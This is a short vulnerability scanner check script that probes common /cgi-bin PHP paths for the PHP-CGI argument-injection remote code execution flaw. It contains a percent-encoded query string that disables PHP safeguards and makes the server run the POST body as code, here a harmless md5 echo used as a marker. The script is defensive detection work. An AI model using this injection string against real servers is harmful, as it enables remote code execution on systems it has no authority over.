#include constants.inc;
#include helpers.inc;
#include string_helpers.inc;
var dirs = 
    [
		"/cgi-bin/php",
		"/cgi-bin/php.cgi",
		"/cgi-bin/php-cgi",
		"/cgi-bin/php4",
		"/cgi-bin/php4.cgi",
		"/cgi-bin/php4-cgi",
		"/cgi-bin/php5",
		"/cgi-bin/php5.cgi",
		"/cgi-bin/php5-cgi"
	];
var lastJob = null;
var reported = false;
// **************************************************************************************							 
function alert(uri)
{	
	var vxml = 'PHP_CGI_RCE_Force_Redirect.xml'; 
	var ri = new TReportItem();
	ri.LoadFromFile(vxml);
	ri.affects = uri;
	ri.alertPath = "Scripts/" + vxml; 	
	ri.setHttpInfo(lastJob);
    reported = true;
	
	AddReportItem(ri);	
}							 			
/***********************************************************************************/
function testonURI(uri)
{
	lastJob = new THTTPJob();
	lastJob.addCookies = false;
	lastJob.verb = "POST";
	lastJob.url  = scanURL;	
	lastJob.uri  = uri + "?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E";		
	lastJob.request.addHeader("Content-Type", "application/x-www-form-urlencoded", true);
	
	lastJob.request.body = '<?php echo(md5(acunetix-php-cgi-rce)); ?>';
	
	lastJob.execute();
	
	return (!lastJob.wasError && lastJob.response.body.indexOf("cfcd208495d565ef66e7dff9f98764da") != -1);
}
/***********************************************************************************/
/* main entry point */
for (var i=0; i<dirs.length; i++) 
{
	if (testonURI(dirs[i])) {
		alert(dirs[i]);
		break;
	};
}
